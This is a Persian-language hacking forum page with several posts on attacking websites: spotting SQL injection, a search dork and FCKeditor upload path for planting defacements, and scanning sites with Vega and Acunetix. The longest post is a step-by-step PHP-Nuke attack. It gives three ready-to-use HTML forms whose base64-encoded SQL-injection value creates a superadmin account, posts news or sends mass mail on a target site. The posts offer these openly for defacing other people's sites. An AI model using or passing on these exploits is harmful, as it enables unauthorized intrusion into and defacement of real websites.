رفتن به مطلب
امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

  • مطالب مشابه

    • توسط  petya_malware
      باگ sql یا همان  sql injection  این باگ در سال 2012 شناسایی شده است این باگ یکی از خطاهای بزرگ برنامه نویسی میباشد . 
      اغلب یا هکر وقتی اگر بخواهد به سایت مقابل حمله نمایید اول به دیتابیس سایت نفوذ میکنه بعد از نفوذ رمز و یوزر نیم صفحه ادمین را یافته و سایت را دیفیس مینمایید.
      برای فهمیدن و شناسایی این باگ کافیست سایت خود را با اسکنر های متفاوت اسکن کنید از جمله 
      برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      این دو یکی از قوی ترین اسکنر های موجود در زمینه هک میباشند.
      به سایت خودتان به خوب نگاه کنید اگر دروک زید در اخر سایت تان بود یعنی سایت دارای باگ sql میباشد
      برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      یا اگر نبود با گذاشتن ' به اخر سایت اگر سایت ارور داد یعنی دارای باگ sql میباشد اگر وارد شد یعنی باگ sql ندارد .
      با تشکز 
    • توسط  petya_malware
      باگ xss نوعی از خطرناک ترین باگ ها در روی سایت ها می باشد 
      دروک مورد نیاز برای یافتن سایت های دارای باگ xss 
      دروک 👇 
      inurl:frame=product_detail
      خب حالا خواستیم دیفیس خود را روی سایتی که دارای باگ هست اپلود کنیم دروک زیر را بخ اخر سایت وارد میکنیم.
      مثلا اگه ادرس سایت مثل ادرس زیر هست 

      برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      دروک زیرا به این صورت وارد میکنیم/jscripts/FCKeditor/editor/filemanager/upload/test.html
      دروک را به این صورت روی سایت وارد میکنیم 

      برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      وحالا میتونیم دیفیس خود را اپلود کنیم 
      با تشکر ✌
      اموزشی ساده برای تازه کارا میباشد 
       
    • توسط  petya_malware
      خب بریم سراغ اموزش 👇
      1- ابزار اسکن سایت با کالی لینوکس 
      برترین ابزار اسکن سایت در کالی لینوکس Vega میباشد .
      جهت نصب ابزار کافیست درقسمت ترمینال کالی لینوکس دستور 
      Apt-get install Vega 
      را تایپ کرده و ابزار را نصب کنید برای اجرای ابزار هم کافیست عبارت 
      Vega 
      را در ترمینال وارد کنید 
      در قسمت target ادرس سایت را نوشته و اسکن کنید .
      و در اخر نتیجه را بررسی کرده و نوع باگ را بیابید 
      2- اسکن سایت با ویندوز 
      اول برنامه acuntix را دانلود و نصب کرده 
      و بعد برنامه را اجرا کنید روی new scan کلیک کرده و ادرس سایت را تایپ کرده و روی scan کلیک کنید . 
      در اخر نتیجه را بررسى کرده و نوع باگ را بیابید 
      با تشکر
    • توسط  Tabahkar
      هک سایت با باگ php

      به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..
      من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
      برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
      برای این کار کافیه این نوشته رو کپی و پیست کنید.
      کد:
      modules.php?name=Downloads
      این ماژول در تمامی ورژن های php nuke وجود داره.
      خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
      برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
      ممکنه به این شکلها باشه:
      کد:
      برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      www.sitename.com/html/modules.php?name=Downloads برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید
      www.sitename.com/modules.php?name=Downloads برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
      برای اینکه بدونین هست یا نه
      کد:
      modules.php?name=Downloads
      اینو پاک کنین و جاش بنویسید admin.php
      مثلآ:
      کد: www.sitename.com/admin.php
      اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
      اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.
      خوب تالا ما فرض میکنیم که admin.php وجود داره.
      من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
      شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
      بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.

      کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
      وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
      کد:
      <form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

      کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.
      کد:
      <form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>
      کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
      کد:
      <form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>
      خوب اینم از آموزش هک کردن سایتهای popnuke از این روش

      Armin Tabahkar
  • کاربران آنلاین در این صفحه   0 کاربر

    هیچ کاربر عضوی،در حال مشاهده این صفحه نیست.

×